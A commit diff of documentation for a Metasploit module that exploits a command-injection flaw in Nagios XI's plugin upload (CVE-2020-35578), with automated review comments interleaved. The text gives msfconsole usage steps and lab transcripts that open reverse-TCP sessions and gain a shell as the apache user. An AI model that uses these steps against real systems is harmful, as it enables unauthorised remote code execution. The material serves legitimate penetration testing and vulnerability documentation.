Add in fixes to documentation and module that were covered in the review process

This commit is contained in:
Grant Willcox
2021-04-14 15:33:42 -05:00
parent 02b9e5c939
commit 154e237edd
2 changed files with 44 additions and 34 deletions
@@ -1,22 +1,26 @@
## Vulnerable Application
This module exploits a vulnerability (CVE-2020-35578) in `/admin/monitoringplugins.php`
that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated
admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
obtain the Nagios XI version number, which is then used to check if the target is Nagios XI 5.3.0-5.7.9 and therefore vulnerable.
obtain the Nagios XI version number, which is then used to check if the target is Nagios XI prior to 5.8.0 and therefore vulnerable.
Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`.
This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name.
Deleting the malicious plugin/file via the web interface failed during testing, so it is automatically deleted when a session spawns.
Next, the module sends a HTTP POST request to `/admin/monitoringplugins.php` containing a file whose filename is set such that it
will escape the existing command that `/admin/monitoringplugins.php` uses on its backend and will instead cause the server to start
executing the attacker's own commands as the `apache` user.
Once the upload is complete, a new plugin entry will be created along with a corresponding file in `/usr/local/nagios/libexec/`
with the full payload as the file name. Deleting the malicious plugin/file via the web interface was not possible during testing,
so it is automatically deleted when a session spawns.
The module may fail during the first run. If that happens, try running it again with the same settings.
The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1).
The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1)
and has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7.
Valid credentials for a Nagios XI admin user are required for exploitation.
Valid credentials for a Nagios XI admin user are required.
This module has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7.
Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
Detailed installation instructions are available
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
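Review bot: the rewritten version range at line 18 ("prior to 5.8.0") drops the lower bound the previous text carried ("5.3.0-5.7.9", line 17) while the tested versions at line 31 still start at 5.3.0; either confirm that releases before 5.3.0 are affected and handled by the `check` method, or keep the lower bound so `check` does not report untested versions as vulnerable. Two smaller points in the same hunk: the new description at lines 22-24 says the filename "will escape the existing command that `/admin/monitoringplugins.php` uses on its backend" without naming which command the filename is interpolated into or what shell metacharacter it relies on, which is the one fact a reader of a command-injection writeup needs, so suggest filling that in from the module source (e.g. "The filename is passed unescaped to <command>, so a `;` in it terminates that command and the remainder runs as the attacker's command"); and the unchanged sentence "The module may fail during the first run" gives no cause, so a reader cannot tell a transient failure from a non-vulnerable target. A sentence on why the first run fails (or a pointer to the module's retry logic) would resolve that.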
@@ -25,8 +29,8 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account]`
5. Do: `set PASSWORD [password for the Nagios XI account]`
4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
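Review bot: the "with administrative privileges" qualifier added to steps 4 and 5 is not carried into the Options section, whose USERNAME description (visible in the next hunk's context line, "The username for the Nagios XI account to authenticate with. The default value i...") still describes a plain Nagios XI account; update that description and the matching PASSWORD one, since the admin requirement is the precondition the whole module depends on and the Options section is where users look it up.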
@@ -47,14 +51,14 @@ The username for the Nagios XI account to authenticate with. The default value i
```
Id Name
-- ----
0 Linux
0 Linux (x86/x64)
1 CMD
```
## Scenarios
### Nagios XI 5.3.0 running on CentOS 7 - Linux target
```
msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
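Review bot: the target name in the `targets` listing was edited by hand to `Linux (x86/x64)` (line 56) inside a captured-output block, and the duplicated `msf6 > use ...` lines (62/63) show the block was also touched for whitespace only; captured transcripts should be re-recorded from a run of the renamed module rather than patched in place, so that the output (including the option table that follows) matches what the module actually prints. The same applies to the identical hand edits in the later scenario blocks.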
@@ -62,7 +66,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos
lhost => 192.168.1.12
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosxi
password => nagiosxi
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
@@ -99,12 +103,12 @@ Exploit target:
Id Name
-- ----
0 Linux
0 Linux (x86/x64)
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
@@ -125,7 +129,7 @@ Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=4
```
### Nagios XI 5.7.5 running on CentOS 7 - CMD target
```
msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set target 1
target => 1
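Review bot: the CMD-target scenario opens with `linux/x86/meterpreter/reverse_tcp` still selected (line 91) and then runs `set target 1`; the transcript should show the `set payload cmd/unix/...` step (or the module's automatic switch to a compatible payload) so a reader does not reproduce it with a Linux binary payload that target 1 cannot deliver.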
@@ -135,7 +139,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos
lhost => 192.168.1.12
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosadmin
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
@@ -177,7 +181,7 @@ Exploit target:
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
@@ -192,7 +196,7 @@ uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) contex
```
### Nagios XI 5.7.5 running on CentOS 7 (unfinished installation) - Linux target
```
msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
@@ -202,7 +206,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set pass
password => nagiosadmin
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set finish_install true
finish_install => true
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
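Review bot: `set finish_install true` (line 119) is the only place the FINISH_INSTALL option appears, and the Vulnerable Application text in the first hunk never says the module can complete an unfinished Nagios XI installation; document the option there and in the Options section, including what it changes on the target, since finishing a vendor install on a customer host is a side effect an operator must opt into knowingly rather than discover from a scenario heading.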
@@ -239,12 +243,12 @@ Exploit target:
Id Name
-- ----
0 Linux
0 Linux (x86/x64)
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.